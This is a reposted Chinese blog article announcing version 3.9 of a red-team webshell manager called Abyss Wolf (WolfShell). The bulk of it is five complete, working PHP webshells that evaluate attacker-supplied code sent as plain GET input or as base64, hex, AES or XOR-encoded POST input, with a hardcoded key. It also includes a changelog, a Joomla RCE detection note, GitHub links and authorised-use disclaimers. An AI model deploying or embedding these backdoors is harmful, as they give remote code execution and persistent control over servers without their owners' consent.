幽狼V3.9新增PHPWebShell

admin 2026-07-12 05:08:30 网络安全文章 来源:ZONE.CI 全球网 0 阅读模式

文章总结: 幽狼V3.9版本新增多种PHPWebShell,包括AES、XOR、Hex、Base64及Plain明文通讯模式,以兼容不同目标环境与工具。该工具核心采用加密通讯机制,并提及CVE-2026-48907Joomla漏洞检测。文档强调仅限授权环境使用,并提供了GitHub主页链接。 综合评分: 70 文章分类: 恶意软件,漏洞分析,渗透测试,红队,安全工具


cover_image

幽狼V3.9 新增PHP WebShell

0x7556 0x7556

幽狼之影

2026年7月11日 13:19 中国香港

在小说阅读器读本章

去阅读

🐺 幽狼 · Abyss Wolf

传说,在每一行代码的阴影里,蛰伏着一头来自深渊的。它以废弃的字节为食,以破碎的协议为巢。无人得见其形,只因它的爪痕从不留在日志之上。它不追逐光,不咆哮于风,只等那扇虚掩的门扉。当门缝透出权限的微光,幽狼便悄然而至——那时,所有告警沉默,所有进程沉睡,仿佛整个世界都不曾察觉。唯有虚空记得:幽狼已至,万物无声。

更新信息

V3.9 20260705 新增PHP WebShell

  • [+]新增 PHP AES CmdShell

  • [+]新增 PHP XOR CmdShell

  • [+]新增 PHP Hex CmdShell

  • [+]新增 PHP Base64 CmdShell (兼容菜刀)

  • [+]新增 PHP Plain CmdShell (兼容部分组织)

幽狼核心采用AES加密通讯机制,但在实战场景中,并非所有目标环境都预装了AES加密依赖组件。综合兼容性最优的加密通讯方案为XOR、HEX、Base64三类,其中‌Base64编码生成的内容长度最短‌,可适配更多存在长度限制的漏洞场景,同时天然兼容菜刀、哥斯拉等主流WebShell工具。Plain明文通讯模式则专门用于实验环境下的Payload调试,还可直接对接部分组织通过浏览器操作的Shell。

Plain 明文通讯

为了兼容部分组织的Shell密码不加密成Hash

<?php @eval($_GET['WolfShell']); ?>

Base64 加密通讯

为了兼容菜刀等WebShell密码不加密成Hash

<?php @eval($_POST['WolfShell']); ?>

Hex 加密通讯

<?php
@error_reporting(0);
$k&nbsp;=&nbsp;"ca63457538b9b1e0";
if&nbsp;(isset($_POST[$k])) {
&nbsp; &nbsp;&nbsp;$dec&nbsp;= hex2bin($_POST[$k]);
&nbsp; &nbsp;&nbsp;eval($dec);
}
?>

AES 加密通讯

<?php
@error_reporting(0);
session_start();
$key&nbsp;=&nbsp;"ca63457538b9b1e0";
$_SESSION['k'] =&nbsp;$key;
$post_data&nbsp;= file_get_contents("php://input");
if&nbsp;(strlen($post_data) > 0) {
&nbsp; &nbsp;&nbsp;if&nbsp;(extension_loaded('openssl')) {
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;$decrypted_data&nbsp;= openssl_decrypt($post_data,&nbsp;'AES-128-CBC',&nbsp;$key, OPENSSL_RAW_DATA,&nbsp;$key);
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;if&nbsp;($decrypted_data&nbsp;!==&nbsp;false) {
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;&nbsp;eval($decrypted_data);
&nbsp; &nbsp; &nbsp; &nbsp; }
&nbsp; &nbsp; }
}
?>

XOR 加密通讯

<?php
@error_reporting(0);
session_start();
$key&nbsp;=&nbsp;"ca63457538b9b1e0";
$_SESSION['k'] =&nbsp;$key;
$post_data&nbsp;= file_get_contents("php://input");
if&nbsp;(strlen($post_data) > 0) {
&nbsp; &nbsp;&nbsp;$kl&nbsp;= strlen($key);
&nbsp; &nbsp;&nbsp;$decrypted_data&nbsp;=&nbsp;"";
&nbsp; &nbsp;&nbsp;for&nbsp;($i&nbsp;= 0;&nbsp;$i&nbsp;< strlen($post_data);&nbsp;$i++) {
&nbsp; &nbsp; &nbsp; &nbsp;&nbsp;$decrypted_data&nbsp;.=&nbsp;$post_data[$i] ^&nbsp;$key[$i&nbsp;%&nbsp;$kl];
&nbsp; &nbsp; }
&nbsp; &nbsp;&nbsp;eval($decrypted_data);
}
?>

V3.8 20260704 新增分组显示

  • [u]幽狼 EXE 改名 AIbyssWolf 简写AW

  • AI:人工智能

  • abyss:深渊

  • wolf:狼

  • [+]优化Shell加载速度,减少卡顿,XML 解析时不碰 UI

  • [+]右键菜单分组显示 (字母排序、当前组自动打勾、不重复刷新)

  • [+]增加EXE文件SHA1值列表,方便用户验证是否原始文件

CVE-2026-48907  Joomla JCE Editor中的一个 未授权远程代码执行 漏洞检测,影响版本 2.9.99.4 及之前版本。

免责声明

  • 使用WolfShell时,请遵循相关法律法规,确保在授权的环境中进行测试和使用。
  • 本工具仅供教育和研究目的,任何滥用行为将由用户自行承担后果。

软件主页

  • 幽狼Shell:https://github.com/0x7556/wolfshell
  • McpSerer: https://github.com/0x7556/PentestMCP

免责声明:

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。

任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我

本文转载自:幽狼之影 0x7556 0x7556《幽狼V3.9 新增PHP WebShell》

评论:0   参与:  0